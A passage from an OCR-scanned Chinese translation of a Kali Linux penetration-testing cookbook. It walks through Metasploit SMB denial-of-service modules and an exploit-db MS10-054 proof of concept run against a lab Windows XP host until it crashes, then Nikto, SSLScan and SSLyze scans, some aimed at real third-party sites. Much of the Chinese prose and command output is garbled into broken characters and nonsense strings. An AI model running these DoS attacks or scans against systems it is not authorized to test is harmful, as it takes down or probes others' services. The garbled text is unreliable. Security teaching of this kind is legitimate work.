msf » search /dos/windows/smb/ 


Matching Modules 


Name 2 
isclosure Date Rank Description 


auxiliary/dos/windows/smb/ms05_047_pnp 
normal Microsoft Plug and Play Service Registry 


Overflow 

auxiliary/dos/windows/smb/ms06_035_mailslot 2 
006-07-11 normal Microsoft SRV.SYS Mailslot Write Corrupt 
ion 


auxiliary/dos/windows/smb/ms06_063_trans 
normal Microsoft SRV.SYS Pipe Transaction No Nu 
11 
auxiliary/dos/windows/smb/ms09 001 write 
normal Microsoft SRV.SYS WriteAndX Invalid Data 
Offset 
auxiliary/dos/windows/smb/ms09 050 smb2 negotiate pidhigh 
normal Microsoft SRV2.SYS SMB Negotiate Process 
ID Function Table Dereference 


auxiliary/dos/windows/smb/ms09 050 smb2 session logoff 
normal Microsoft SRV2.SYS SMB2 Logoff Remote Ke 
rnel NULL Pointer Dereference 
auxiliary/dos/windows/smb/msi0 006 negotiate response loop 
normal Microsoft Windows 7 / Server 2008 R2 SMB 
Client Infinite Loop 
auxiliary/dos/windows/smb/ms10 054 queryfs pool overflow 
normal Microsoft Windows SRV.SYS SrvSmbQueryFsI 
nformation Pool Overflow DoS 
auxiliary/dos/windows/smb/msi11 019 electbowser 
manual Microsoft Windows Browser Pool DoS 
auxiliary/dos/windows/smb/rras_vls_null_deref 2 
006-06-14 normal Microsoft RRAS InterfaceAdjustVLSPointer 
s NULL Dereference 
auxiliary/dos/windows/smb/vista negotiate stop 
normal Microsoft Vista SPO SMB Negotiate Protoc 
ol DoS 


在 查询 / dos / windows / smb 的 相对 路 径 后 ， 返 回 的 唯一 结果 是 此 目录 中 的 
DoS 模块 。 目录 组 织 良 好 ， 可 用 于 有 效 地 搜索 与 特定 平台 或 服务 相关 的 漏洞 。 一 
旦 我 们 决定 使 用 哪个 漏洞 ， 我 们 可 以 使 用 use 命令 和 模块 的 相对 路 径 来 选择 它 : 


msf > use auxiliary/dos/windows/smb/ms06 063 trans 
msf  auxiliary(ms06 063 trans) > show options 


Module options (auxiliary/dos/windows/smb/msO6 063 trans): 


Name Current Setting Required Description ---- 


RHOST yes The target address 
RPORT 445 yes Set the SMB service port 


一 旦 选择 了 模块 ， show options 命令 可 用 于 确定 和 /修改 扫描 配置 。 此 命令 会 显 
示 四 个 列 标题 ， 包 括 Name , Current Setting , Required ,和 

Description ° Name 列表 示 每 个 可 配置 变量 的 名 称 。 Current Setting 列 
列 出 任何 给 定 变 量 的 现 有 配置 。 Required 列表 明 任 何 给 定 变量 是 否 需 要 值 。 
Description 列 描述 每 个 变量 的 函数 。 可 以 使 用 set 命令 并 通过 提供 新 值 作为 
参数 ， 来 更 改 任何 给 定 变量 的 值 : 


msf auxiliary(ms06 063 trans) > set RHOST 172.16.36.134 
=> 172.16.36.134 
msf  auxiliary(ms06 063 trans) > show options 


Module options (auxiliary/dos/windows/smb/msO6 063 trans): 


Name Current Setting Required Description 
RHOST 172.16.36.134 yes The target address 
RPORT 445 yes Set the SMB service port 


在 提供 的 示例 中 ， RHOST 值 更 改 为 我 们 打算 扫描 的 远程 系统 的 IP 地址。 更 新 必 
要 的 变量 后 ， 可 以 使 用 show options 命令 再 次 验证 配置 。 一旦 验证 了 所 需 的 配 
置 ， 可 以 使 用 run 命令 启动 模块 : 


msf auxiliary(ms06 063 trans) > run 


[*] Connecting to the target system... 

[*] Sending bad SMB transaction request 
[*] Sending bad SMB transaction request 
[*] Sending bad SMB transaction request 
[*] Sending bad SMB transaction request 
[*] Sending bad SMB transaction request 
[*] Auxiliary module execution completed 


oOoRKRWNE 


在 执行 Metasploit DoS 辅助 模块 之 后 ， 返 回 的 一 系列 消息 表明 已 经 执行 了 一 系列 恶 
意 SMB 事务 ， 并 且 返 回 表示 模块 执行 完成 的 最 终 消息 。 该 漏洞 的 成 功 可 以 通过 查 
看 Windows XP 系统 来 验证 ， 它 已 经 前 溃 ， 现 在 显示 BSOD: 
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本 练习 中 演示 的 Metasploit DoS 辅助 模块 是 缓冲 区 溢出 攻击 的 示例 。 一 般 来 说 ， 
缓冲 区 溢出 能 够 导致 拒绝 服务 ， 因 为 它们 可 能 导致 任意 数据 被 加 载 到 非 预 期 的 内 存 
Bo 这 可 能 中 断 执行 流程 ， 并 导致 服务 或 操作 系统 谣 溃 。 


6.11 使 用 exploit-db 执行 DoS 攻击 


exploit-db 是 针对 所 有 类 型 的 平台 和 服务 的 ， 公 开发 布 的 漏洞 利用 集合 。 exploit-db 
拥有 许多 可 用 于 执行 DoS 攻 击 的 漏洞 。 这 个 特定 的 秘籍 演示 了 如 何在 exploit-db 中 
找到 DoS 漏 洞 ， 确 定 漏洞 的 用 法 ， 进 行 必要 的 修改 并 执行 它们 。 


准备 
为 了 使 用 exploit-db 执行 DoS 攻击 ， 你 需要 有 一 个 运行 漏洞 服务 的 系统 ， 它 易 受 
Metasploit DoS 辅助 模块 之 一 的 攻击 。 所 提供 的 示例 使 用 Windows XP 的 实例 。 


有 关 设 置 Windows 系统 的 更 多 信息 ， 请 参阅 本 书 第 一 章 中 的 “安装 Windows 
Server 秘籍。 


操作 步骤 


在 使 用 exploit-db 执行 DoS 测试 之 前 ， 我 们 需要 确定 哪些 DOS 漏洞 可 用 。 可 以 
在 http://www.exploit-db.com 在 线 找到 全 部 的 漏洞 利用 数据 库 。 或 者 ， 其 副 
本 也 本 地 存储 在 Kali Linux 文件 系统 中 。 在 exploitdb 目录 中 有 一 

个 files.csv 文件 ， 其 中 包含 所 有 内 容 的 目录 。 此 文件 可 用 于 对 关键 字 进 

行 grep ， 来 帮助 定位 可 用 的 漏洞 利用 : 
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root@KaliLinux:~# grep SMB /usr/share/exploitdb/files.csv 

20, platforms/windows/remote/20.txt,"MS Windows SMB Authenticatio 
n Remote Exploit", 2003-04-25, ""Haamed Gheibi", windows, remote, 139 

1065, platforms/windows/dos/1065.c,"MS Windows (SMB) Transaction 

Response Handling Exploit (MS05-011)", 2005-06-23, cybertronic, win 
dows, dos, 0 

4478, platforms/linux/remote/4478.c,"smbftpd 0.96 SMBDirListfunct 
ion Remote Format String Exploit",2007-10-01,"Jerry Illikainen", 
linux,remote,21 

6463, platforms/windows/dos/6463.rb,"MS Windows WRITE ANDX SMB co 
mmand handling Kernel DoS (meta)",2008-09-15,"Javier Vicente Val 
lejo",windows,dos,0 

9594, platforms/windows/dos/9594.txt, Windows Vista/7 SMB2.0 Nego 
tiate Protocol Request Remote BSOD Vuln",2009-09-09,"Laurent Gaf 
fie",windows, dos, 0 


在 所 提供 的 示例 中 ， 我 们 使 用 grep 有 函数 在 files.csv 文件 中 搜索 包含 SMB 的 
任何 exploit-db 内 容 。 还 可 以 通过 将 输出 通过 管道 连接 到 另 一 个 grep 函数 ， 并 搜 
索 附 加 项 来 进一步 缩小 搜索 范围 : 


root@KaliLinux:~# grep SMB /usr/share/exploitdb/files.csv | grep 
dos 

1065, platforms/windows/dos/1065.c,"MS Windows (SMB) Transaction 
Response Handling Exploit (MS05-011)",2005-06-23,cybertronic,win 
dows, dos, 0 

6463, platforms/windows/dos/6463.rb,"MS Windows WRITE ANDX SMB co 

mmand handling Kernel DoS (meta)",2008-09-15,"Javier Vicente Val 
lejo",windows, dos, 0 

9594, platforms/windows/dos/9594.txt, Windows Vista/7 SMB2.0 Nego 
tiate Protocol Request Remote BSOD Vuln",2009-09-09,"Laurent Gaf 
fie",windows,gdos,0 

12258,platforms/windows/dos/12258.py," Proof of Concept for MS10- 
006 SMB Client-Side Bug", 2010-04-16, "Laurent Gaffie",windows,dos 
0 

, 

12273, platforms/windows/dos/12273.py, "Windows 7/2008R2 SMB Clien 
t Trans2 Stack Overflow 10-020 PoC", 2010-04-17,"Laurent Gaffie", 

windows, dos, 0 


在 提供 的 示例 中 ， 我 们 依次 使 用 两 个 独立 的 grep 函数 ， 来 搜索 与 SMB 服务 相关 
的 任何 DoS 漏洞 : 


root@KaliLinux:~# grep SMB /usr/share/exploitdb/files.csv | grep 
dos | grep py | grep -v "Windows 7" 

12258,platforms/windows/dos/12258.py," Proof of Concept for MS10- 
006 SMB Client-Side Bug",2010-04-16,"Laurent Gaffie",windows,dos 


0 

$ 

12524, platforms/windows/dos/12524.py, Windows SMB2 Negotiate Pro 
tocol (0x72) Response DOS",2010-05-07, "Jelmer de Hen",windows, do 
s,0 

14607,platforms/windows/dos/14607.py," Microsoft SMB Server Trans 
2 Zero Size Pool Alloc (MS10-054)",2010-08-10,"Laurent Gaffie",w 
indows, dos,0 


我 们 可 以 继续 缩小 搜索 结果 ， 使 其 尽 可 能 具体 。 在 提供 的 示例 中 ， 我 们 查找 了 
SMB 服务 的 任何 Python DoS 脚本 ， 但 是 我 们 寻找 的 不 是 Windows 7 平台 的 。 

gre p 中 的 -v 选项 可 用 于 从 结果 中 排除 内 容 。 通常 最 好 将 所 需 的 漏洞 利用 复制 
到 另 一 个 位 置 ， 以 便 不 会 修改 exploit 数据 库 目录 的 内 容 : 


root@KaliLinux:~# mkdir smb exploit 

root@KaliLinux:~# cd smb exploit/ 

rootüKaliLinux:-/smb exploits cp /usr/share/exploitdb/platforms/ 
windows/ dos/14607.py /root/smb exploit/ 
root@KaliLinux:~/smb_exploit# ls 14607.py 


在 提供 的 示例 中 ， 我 们 为 脚本 创建 一 个 新 目录 。 然后 从 绝对 路 径 复制 脚本 ， 该 路 径 
可 以 由 exploit-db 的 目录 位 置 和 files.csv 文件 中 定义 的 相对 路 径 推断 。 一 旦 重 
新 定位 ， 就 可 以 使 用 cat 命令 从 上 到 下 读 取 脚 本 ， 然 后 将 脚本 的 内 容 传递 

给 more LH: 


root@KaliLinux:~/smb_exploit# cat 14607.py | more ? 


#!/usr/bin/env python 
import sys,struct, socket 
from socket import * 


if len(sys.argv)<=2: 

print 'Z/4HEHHHHHHHHHHHHHHHHHHHHBHHHHHHBHHBHHHBHHHBHHHBHHHHBHHHE 
THHHHHHHHHE THHHHHHBIE' 

print '# MS10-054 Proof Of Concept by Laurent Gaffie' 

print '# Usage: python '+sys.argv[0]+' TARGET SHARE-NAME ( 
No backslash)' 

print '# Example: python '+sys.argv[0]+' 192.168.8.101 use 
rs' 

print '# http://g-laurent.blogspot.com/' 

print '# http://twitter.com/laurentgaffie' 

print '# Email: laurent.gaffie{at}gmail{dot}com' 

print 'Z/fHHEHHHHHHHHHHHHHHHHHHHHBHHHHHHBHHBHHHBHHHHBHHHHBHHHHHBHHHE 
THHHHHHHHHE: THHHHHHHINDNn' 

sys.exit() 


5 NSE 脚本 和 Metasploit 辅助 模块 不 同 ， 漏 洞 数据 库 中 的 脚本 没有 标准 化 格式 。 
因此 ， 使 用 漏洞 有 时 会 很 奈 手 。 尽管 如 此 ， 查 看 脚本 内 容 中 的 为 注释 或 使 用 说 明 通 
常 是 有 帮助 的 。 在 提供 的 示例 中 ， 我 们 可 以 看 到 ， 使 用 情况 列 在 脚本 的 内 容 中 ， 如 
果 未 提供 适当 数量 的 参数 ， 也 会 将 其 打印 给 用 户 。 评估 之 后 ， 可 以 执行 脚本 。 


rootüKaliLinux:-/smb exploit£ ./14607.py 

./14607.py: line 1: ?#!/usr/bin/env: No such file or directory 
import.im6: unable to open X server `' @ error/import.c/ 
ImportImageCommand/368. 

from: can't read /var/mail/socket 

./14607.py: line 4: $'\r': command not found 

./14607.py: line 5: syntax error near unexpected token 'sys.argv 


'/14607.py: line 5: "if len(sys.argv)<=2: 


但 是 ， 在 尝试 执行 脚本 后 ， 我 们 可 以 看 到 出 现 了 问题 。 由 于 缺乏 标准 化 ， 并 且 由 于 
一 些 脚本 只 是 概念 证 明 ， 通 常 需要 对 这 些 脚 本 进行 调整 : 


?#!/usr/bin/env python 
import sys, struct, socket 
from socket import * 


在 脚本 错误 出 现 后 ， 我 们 需要 返回 到 文本 编辑 器 ， 并 尝试 确定 错误 的 来 源 。 第 一 个 
错误 表明 ， 在 脚本 开头 列 出 的 Python 解释 器 的 位 置 存在 问题 。 这 必须 改变 为 指向 
Kali Linux 文件 系统 中 的 解释 器 : 


#!/usr/bin/python 
import sys, struct, socket 
from socket import * 


在 每 个 问题 解决 后 ， 尝 试 再 次 运行 脚本 通常 是 个 好 主意 ， 有 了 时， 修复 单个 问题 会 消 
除 多 个 执行 错误 。 这 里 ， 在 更 改 Python 解释 器 的 位 置 后 ， 我 们 可 以 成 功 运行 脚 
本 : 


root@KaliLinux:~/smb_exploit# ./14607.py 172.16.36.134 users 
[+]Negotiate Protocol Request sent 

[+]Malformed Trans2 packet sent 

[+]The target should be down now 


一 条 消 ， a. & AW AE we 忌 
过 返回 Windows ^s 


当 脚 本 运行 时 ! SELAH ERIS UN ATOR ^ RUE 
载荷 已 传送 ， 服 务 器 应 该 已 经 前 溃 。 该 脚本 的 成 功 执行 可 以 通 
务 器 来 验证 ， 它 现在 已 经 前 溃 ， 并 显示 了 BSOD: 





工作 原理 
本 练习 中 演示 的 exploit-db DoS 脚本 是 缓冲 区 溢出 攻击 的 示例 。 一 般 来 说 ， 缓 冲 


溢出 能 够 导致 拒绝 服务 ， 因 为 它们 可 能 导致 任意 数据 被 加 载 到 非 预 期 的 内 存 段 。 
可 能 中 断 执 行 流程 ， 并 导致 服务 或 操作 系统 崩溃 。 
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近 几 年 来 ， 我 们 看 到 越 来 越 多 的 媒体 报导 了 大 公司 和 政府 的 数据 泄露 。 并 且 ， 随 着 
公众 对 安全 的 意思 逐渐 增强 ， 通 过 利用 标准 的 周边 服务 来 潜入 组 织 的 网 络 越 来 越 困 
难 。 和 这 些 服 务 相 关 的 公开 漏洞 通常 很 快 会 打上 补丁 ， 不 可 能 用 于 攻击 。 相 反 ， 
Web 应 用 通常 包含 自 定 义 代 码 ， 它 们 通常 不 会 拥有 和 来 自 独立 厂商 的 网 络 服务 相同 
的 安全 审计 。Web 应 用 通常 是 组 织 外 围 的 脆弱 点 ， 因 为 如 此 ， 这 些 服务 的 适当 扫描 
和 评估 相当 重要 。 


在 详细 讲解 每 个 秘籍 之 前 ， 我 们 会 讨论 一 些 关于 BurpSuite 和 sqlmap 的 常见 信 
息 ， 因 为 这 些 工 具 在 贯穿 本 章 的 多 个 秘籍 中 都 相当 重要 。BurpSuite X Kali 自 带 的 
基于 Java 的 图 形 化 工具 ， 用 于 记录 、 拦 截 和 操作 客户 端 浏览 器 和 远程 Web 服务 之 
间 的 请 求 和 响应 。 它 可 能 是 用 于 Web 应 用 渗透 测试 的 最 强大 的 工具 之 一 ， 因 为 让 
攻击 者 能 够 完全 控制 如 何 和 远程 Web 服务 器 通信 。 它 可 以 操作 大 量 事先 在 用 户 济 
览 器 或 会 话 中 定义 好 的 信息 。sqlmap X Kali 中 的 继承 命令 行 工 具 ， 它 通过 自动 化 
整个 流程 ， 极 大 降低 利用 SQL 注入 漏洞 所 需 的 精力 。sqlmap 的 工作 方式 是 提交 来 
自己 知 SQL 注入 查询 的 大 量 列 表 的 请 求 。 它 在 数 年 间 已 经 高 度 优化 ， 可 以 基于 之 
前 请 求 的 响应 来 智能 尝试 注入 。 


7.1 使 用 Nikto 扫描 Web 应 用 


Nikto 是 Kali 中 的 命令 行 工 具 ， 用 于 评估 Web 应 用 的 已 知 安全 问题 。Nikto RA 
标 站 点 并 生成 大 量 预 先 准备 的 请 求 ， 尝 试 识 别 应 用 中 存在 的 危险 脚本 和 文件 。 这 个 
秘籍 中 ， 我 们 会 讨论 如 何 针 对 Web 应 用 执行 Nikto， 以 及 如 何 解释 结果 。 


准备 


为 了 使 用 Nikto 对 目标 执行 Web 应 用 分 析 ， 你 需要 拥有 运行 一 个 或 多 个 Web 应 用 
的 远程 系统 。 所 提供 的 例子 中 ， 我 们 使 用 Metasploitable2 实例 来 完成 任务 。 
Metasploitable2 拥有 多 种 预 安装 的 漏洞 Web 应 用 ， 运 行 在 TCP 80 端口 上 。 配 置 
Metasploitable2 的 更 多 信息 请 参考 第 一 章 中 的 “安装 Metasploitable2" 54$ » 


操作 步骤 


和 执行 Nikto 相关 的 复杂 语法 和 用 法 ， 很 大 程度 上 取决 于 目标 应 用 的 本 质 。 为 了 查 
看 用 法 和 语法 的 概览 ， 使 用 nikto -help 命令 。 在 所 提供 的 第 一 个 例子 中 ， 我 们 
对 google.com 进行 扫描 。 -host 参数 可 以 用 于 指定 需要 扫描 的 目标 的 主机 名 
称 。 -port 选项 定义 了 Web 服务 所 运行 的 端口 。 -ssl 选项 告诉 Nikto 在 扫描 之 
前 ， 与 目标 服务 器 建立 SSL/TLS 会 话 。 


root@KaliLinux:~# nikto -host google.com -port 443 -ssl 
- Nikto v2.1.4 


+ Target IP: 74.125.229.161 

+ Target Hostname: google.com 

+ Target Port: 443 

+ SSL Info: Subject: /C=US/ST=California/L=Mountain View/ 


0-Google Inc/CN-*.google.com 
Ciphers: ECDHE-RSA-AES128-GCM-SHA256 


Issuer: /C=US/0=Google Inc/CN-Google Interne 
t Authority G2 
* Start Time: 2014-03-30 02:30:10 


+ Server: gws 
+ Root page / redirects to: https://www.google.com/ 
+ Server banner has changed from gws to GFE/2.0, this may sugges 
t a WAF or load balancer is in place 
** {TRUNCATED} ** 


作为 替代 ， -host 参数 可 以 用 于 定义 目标 系统 的 IP 地 址 。 -nossl 参数 可 以 用 
于 告诉 Nikto 不 要 使 用 任何 传输 层 的 安全 。 -vhost 选项 用 于 指定 HTTP 请 求 中 的 
主机 协议 头 的 值 。 在 多 个 虚拟 主机 名 称 托管 在 单个 IP 地 址 上 的 时 候 ， 这 非常 有 

用 。 看 看 下 面 的 例子 : 


root@KaliLinux:~# nikto -host 83.166.169.228 -port 80 -nossl -vh 
ost packtpub.com 
- Nikto v2.1.4 


* Target IP: 83.166.169.228 

* Target Hostname: packtpub.com 

+ Target Port: 80 

* Start Time: 2014-03-30 02:40:29 


* Server: Varnish 

* Root page / redirects to: http://www.packtpub.com/ 

* No CGI Directories found (use '-C all' to force check all poss 

ible dirs) 

* OSVDB-5737: WebLogic may reveal its internal IP or hostname in 
the Location header. The value is "http://www.packtpub.com. " 


在 上 面 的 例子 中 ，Nikto 对 Metasploitable2 系统 上 托管 的 Web IR 2-341 T 4a 
tic -port 参数 没有 使 用 ， 因 为 Web 服务 托管 到 TCP 80 端口 上 ， 这 是 HTTP 
的 默认 端口 。 此 外 ， -nossl 参数 也 没有 使 用 ， 因 为 通常 Nikto 不 会 尝试 80 端口 
上 的 SSL/TLS 连接 。 考 虑 下 面 的 例子 : 


root@KaliLinux:~# nikto -host 172.16.36.135 
- Nikto v2.1.4 


+ Target IP: 172.16.36.135 
+ Target Hostname: 172.16.36.135 

+ Target Port: 80 

+ Start Time: 2014-03-29 23:54:28 


+ Server: Apache/2.2.8 (Ubuntu) DAV/2 

+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.10 

+ Apache/2.2.8 appears to be outdated (current is at least Apach 

e/2.2.17). Apache 1.3.42 (final release) and 2.0.64 are also cur 
rent. 

+ DEBUG HTTP verb may show server debugging information. See htt 
p://msdn. microsoft.com/en-us/library/e8z01xdh%28VS .80%29.aspx f 

or details. 

+ OSVDB-877: HTTP TRACE method is active, suggesting the host is 
vulnerable to XST 

+ OSVDB-3233: /phpinfo.php: Contains PHP configuration informati 

on 

+ OSVDB-3268: /doc/: Directory indexing found. 

+ OSVDB-48: /doc/: The /doc/ directory is browsable. This may be 
/usr/ doc. 

+ OSVDB-12184: /index.php?=PHPB8B5F2A0 - 3C92 -11d3-A3A9 - 4C7B08C100 

00: PHP reveals potentially sensitive information via certain HT 

TP requests that contain specific QUERY strings. 

* OSVDB-3092: /phpMyAdmin/: phpMyAdmin is for managing MySQL dat 

abases, and should be protected or limited to authorized hosts. 

* OSVDB-3268: /test/: Directory indexing found. 

* OSVDB-3092: /test/: This might be interesting... 

* OSVDB-3268: /icons/: Directory indexing found. 

* OSVDB-3233: /icons/README: Apache default file found. 

* 6448 items checked: 1 error(s) and 13 item(s) reported on remo 

te host 

* End Time: 2014-03-29 23:55:00 (32 seconds) 


* 1 host(s) tested 


Nikto 的 Metasploitable2 扫描 结果 展示 了 一 些 经 常 被 Nikto 识别 的 项 目 。 这 些 项 目 
包括 危险 的 HTTP 方法 ， 默 认 的 安装 文件 ， 暴 露 的 目录 列表 ， 敏 感 信 息 ， 以 及 应 该 
被 限制 访问 的 文件 。 注 意 这 些 文件 通常 对 于 获取 服务 器 访问 以 及 寻找 服务 器 漏洞 很 
有 帮助 。 


工作 原理 


Nikto 识别 潜在 的 可 疑 文 件 ， 通 过 引用 robots.txt ， 尺 取 网 站 页 面 ， 以 及 遍历 包 
含 敏感 信息 、 汤 洞 内 容 ， 或 者 由 于 内 容 的 本 质 或 所 表现 的 功能 而 应 该 被 限制 的 已 知 
文件 列表 。 


7.2 使 用 SSLScan 扫描 SSL/TLS 


SSLScan X Kali 中 的 集成 命令 行 工具 ， 用 于 评估 远程 Web 服务 的 SSL/TLS 的 安 
全 性 。 这 个 秘籍 中 ， 我 们 会 讨论 如 何 对 Web 应 用 执行 SSLScan， 以 及 如 何 解 释 或 
操作 输出 结果 。 


准备 


为 了 使 用 SSLScan 对 目标 执行 SSL/TLS 分 析 ， 你 需要 拥有 运行 一 个 或 多 个 Web 
应 用 的 远程 系统 。 所 提供 的 例子 中 ， 我 们 使 用 Metasploitable2 实例 来 完成 任务 。 
Metasploitable2 拥有 多 种 预 安装 的 漏洞 Web 应 用 ， 运 行 在 TCP 80 端口 上 。 配 置 
Metasploitable2 的 更 多 信息 请 参考 第 一 章 中 的 “安装 Metasploitable2" $548 » 


操作 步骤 


SSLScan 是 个 高 效 的 工具 ， 用 于 对 目标 Web 服务 执行 精简 的 SSL/TLS 配置 分 
析 。 为 了 对 带 有 域名 Web 服务 执行 基本 的 扫描 ， 只 需要 将 域名 作为 参数 传递 给 
它 ， 就 像 这 样 : 


root@KaliLinux:~# sslscan google.com 














Version 1.8.2 
http://www.titania.co.uk 
Copyright Ian Ventura-Whiting 2009 


Testing SSL server google.com on port 443 
Supported Server Cipher(s): 
Failed SSLv3 256 bits ECDHE-RSA-AES256-GCM-SHA384 
Failed SSLv3 256 bits ECDHE-ECDSA-AES256-GCM-SHA384 
Failed SSLv3 256 bits ECDHE-RSA-AES256 -SHA384 
Failed SSLv3 256 bits ECDHE-ECDSA-AES256-SHA384 
Accepted SSLv3 256 bits ECDHE-RSA-AES256-SHA 
Rejected SSLv3 256 bits ECDHE-ECDSA-AES256-SHA 
Rejected SSLv3 256 bits SRP-DSS-AES-256-CBC-SHA 
Rejected SSLv3 256 bits SRP-RSA-AES-256-CBC-SHA 
Failed SSLv3 256 bits DHE-DSS-AES256-GCM-SHA384 
Failed SSLv3 256 bits DHE-RSA-AES256-GCM-SHA384 
Failed SSLv3 256 bits DHE-RSA-AES256-SHA256 
Failed SSLv3 256 bits DHE-DSS-AES256-SHA256 
Rejected SSLv3 256 bits DHE-RSA-AES256-SHA 
Rejected SSLv3 256 bits DHE-DSS-AES256-SHA 
Rejected SSLv3 256 bits DHE-RSA-CAMELLIA256-SHA 
Rejected SSLv3 256 bits DHE-DSS-CAMELLIA256-SHA 
** {TRUNCATED} ** 


在 执行 时 ，SSLScan 会 快速 遍历 目标 服务 器 的 连接 ， 并 且 枚 举 所 接受 的 密 文 ， 首 
选 的 密 文 族 ， 以 及 SSL 证 书信 息 。 可 以 用 grep 在 输出 中 寻找 所 需 信 息 。 在 下 面 
的 例子 中 ， grep 仅仅 用 于 查看 接受 的 密 文 。 


root@KaliLinux:~# sslscan google.com | grep Accepted 


Accepted SSLv3 256 bits ECDHE-RSA-AES256-SHA 
Accepted SSLv3 256 bits AES256-SHA 

Accepted SSLv3 168 bits ECDHE-RSA-DES-CBC3-SHA 
Accepted SSLv3 168 bits DES-CBC3-SHA 

Accepted SSLv3 128 bits ECDHE-RSA-AES128-SHA 
Accepted SSLv3 128 bits AES128-SHA 

Accepted SSLv3 128 bits ECDHE-RSA-RC4-SHA 
Accepted SSLv3 128 bits RC4-SHA 

Accepted SSLv3 128 bits RC4-MD5 

Accepted TLSv1 256 bits ECDHE-RSA-AES256-SHA 
Accepted TLSv1 256 bits AES256-SHA 

Accepted TLSv1 168 bits ECDHE-RSA-DES-CBC3-SHA 
Accepted TLSv1 168 bits DES-CBC3-SHA 

Accepted TLSv1 128 bits ECDHE-RSA-AES128-SHA 
Accepted TLSv1 128 bits AES128-SHA 

Accepted TLSv1 128 bits ECDHE-RSA-RC4-SHA 
Accepted TLSv1 128 bits RC4-SHA 

Accepted TLSv1 128 bits RC4-MD5 


多 个 grep 函数 可 以 进一步 过 滤 输 出 。 通 过 使 用 多 个 grep 管道 请 求 ， 下 面 例子 
中 的 输出 限制 为 256 位 密 文 ， 它 可 以 被 服务 器 接受 。 


root@KaliLinux:~# sslscan google.com | grep Accepted | grep "256 
bits" 


Accepted 
Accepted 
Accepted 
Accepted 


SSLv3 
SSLv3 
TLSv1 
TLSv1 


256 bits 
256 bits 
256 bits 
256 bits 


ECDHE -RSA-AES256-SHA 
AES256-SHA 
ECDHE -RSA-AES256-SHA 
AES256-SHA 


SSLScan 提供 的 一 个 独特 的 功能 就 是 SMTP 中 的 STARTTLS 请 求 的 实现 。 这 允许 
SSLScan 轻易 并 高 效 地 测试 邮件 服务 的 传输 安全 层 ， 通 过 使 用 --starttls 参数 
并 随后 指定 目标 IP 地 址 和 端口 。 下 面 的 例子 中 ， 我 们 使 用 SSLScan 来 判断 
Metasploitable2 所 集成 的 SMTP 服务 是 否 支 持 任何 脆弱 的 40 位 密 文 : 


root@KaliLinux:~# sslscan --starttls 172.16.36.135:25 | grep Acc 


epted | grep "40 bits" 
Accepted TLSv1 40 bits EXP - EDH- RSA- DES- CBC -SHA 
Accepted TLSv1 40 bits EXP - ADH -DES-CBC- SHA 
Accepted TLSv1 40 bits EXP -DES -CBC - SHA 
Accepted TLSv1 40 bits EXP - RC2 -CBC-MD5 
Accepted TLSv1 40 bits EXP - ADH - RCA- MD5 
Accepted TLSv1 40 bits EXP - RCA -MD5 


工作 原理 


SSL/TLS 会 话 通常 通过 客户 端 和 服务 端 之 间 的 协商 来 建立 。 这 些 协商 会 考虑 到 每 一 
端 配 置 的 密 文 首选 项 ， 并 且 尝 试 判断 双方 都 支持 的 最 安全 的 方案 。SSLScan 的 原 
理 是 遍历 已 知 密 文 和 密 钥 长 度 的 列表 ， 并 尝试 使 用 每 个 配置 来 和 远程 服务 器 协商 会 
话 。 这 允许 SSLScan 枚 举 受 支持 的 密 文 和 密 钥 。 


7.3 使 用 SSLyze 扫描 SSL/TLS 


SSLyze X Kali 中 的 集成 命令 行 工 具 ， 用 于 评估 远程 Web 服务 的 SSL/TLS 的 安全 
性 。 这 个 秘籍 中 ， 我 们 会 讨论 如 何 对 Web 应 用 执行 SSLyze， 以 及 如 何 解 释 或 操作 
输出 结果 。 


准备 


为 了 使 用 SSLScan 对 目标 执行 SSL/TLS 分 析 ， 你 需要 拥有 运行 一 个 或 多 个 Web 
应 用 的 远程 系统 。 所 提供 的 例子 中 ， 我 们 使 用 Metasploitable2 实例 来 完成 任务 。 
Metasploitable2 拥有 多 种 预 安装 的 漏洞 Web 应 用 ， 运 行 在 TCP 80 端口 上 。 配 置 
Metasploitable2 的 更 多 信息 请 参考 第 一 章 中 的 “安装 Metasploitable2" $548 » 


操作 步骤 
另 一 个 用 于 对 SSL/TLS 配置 执行 彻底 排查 和 分 析 的 工具 就 是 SSLyze。 为 了 使 用 
SSLyze 执行 基本 的 测试 ， 需 要 包含 目标 服务 器 作为 参数 ， 以 及 --regular 参 


数 。 这 包括 SSLv2、SSLv3、TLSv1、renegotiation、resumption、 证 书信 息 、 
HTTP GET 响应 状态 码 ， 以 及 压缩 支持 的 测试 。 


root@KaliLinux:~# sslyze google.com --regular 


REGISTERING AVAILABLE PLUGINS 


PluginSessionResumption 
PluginCertInfo 
PluginOpenSSLCipherSuites 
PluginSessionRenegotiation 
PluginCompression 


CHECKING HOST(S) AVAILABILITY 


google.com:443 => 74.125.226.166:443 


* Compression : 
Compression Support: Disabled 


* Certificate : 


Validation w/ Mozilla's CA Store: Certificate is Trusted 


Hostname Validation: OK - Subject Alternativ 
e Name Matches 

SHA1 Fingerprint: EF8845009EED2B2FE95D233 
18C8CF30F1052B596 

Common Name: *.google.com 

Issuer: /C=US/0=Google Inc/CN=G 
oogle Internet Authority G2 Serial 

Number : 5EOEFAF2A99854BD 

Not 

Before: Mar 12 09:53:40 2014 GMT 

Not After: Jun 10 00:00:00 2014 GM 
T 

Signature Algorithm: shaiWithRSAEncryption 

Key Size: 2048 


X509v3 Subject Alternative Name: DNS:*.google.com, DNS:* 
android.com, DNS:*.appengine.google.com, DNS:*.cloud.google.co 
m, DNS:*. google-analytics.com, DNS:*.google.ca, DNS:*.google.cl 
, DNS:*.google. co.in, DNS:*.google.co.jp, DNS:*.google.co.uk, D 
NS:*.google.com.ar, DNS:*.google.com.au, DNS:*.google.com.br, DN 
S:*.google.com.co, DNS:*. google.com.mx, DNS:*.google.com.tr, DN 
S:*.google.com.vn, DNS:*.google. de, DNS:*.google.es, DNS:*.goog 
le.fr, DNS:*.google.hu, DNS:*.google. it, DNS:*.google.nl, DNS:* 
.google.pl, DNS:*.google.pt, DNS:*.googleapis. cn, DNS:*.googlec 
ommerce.com, DNS:*.googlevideo.com, DNS:*.gstatic.com, DNS:*.gvt 
1.com, DNS:*.urchin.com, DNS:*.url.google.com, DNS:*.youtubenoco 
okie.com, DNS:*.youtube.com, DNS:*.youtubeeducation.com, DNS:*.y 
timg. com, DNS:android.com, DNS:g.co, DNS:goo.gl, DNS:google-ana 
lytics.com, DNS:google.com, DNS:googlecommerce.com, DNS:urchin.c 
om, DNS:youtu.be, DNS:youtube.com, DNS:youtubeeducation.com 
** {TRUNCATED} ** 


